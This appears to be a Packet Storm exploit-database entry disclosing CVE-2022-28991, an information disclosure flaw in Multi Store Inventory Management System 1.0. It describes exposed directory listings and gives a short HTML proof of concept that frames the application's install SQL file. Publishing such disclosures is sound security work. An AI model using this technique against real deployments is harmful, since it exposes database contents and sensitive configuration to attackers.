CVE-2022-28991: Multi Store Inventory Management System 1.0 Information Disclosure ≈ Packet Storm

# Exploit Title: Multi Store Inventory Management System - Information Disclosure# Date: 04/04/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.bdtask.com/# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/# Version: 1.0# Tested on: XAMPP, Windows 10# Contact: https://twitter.com/dmaral3noz# Description :The application allows directory listing and information disclosure ofsome sensitive files that can allow an attacker to leverage the disclosedinformation.################################################PoC Html :<html><head><body><title>Multi Store Inventory Management System - Information Disclosure</title><iframesrc=http://127.0.0.1/multistore_demo/install/sql/install.sql></body></head><html>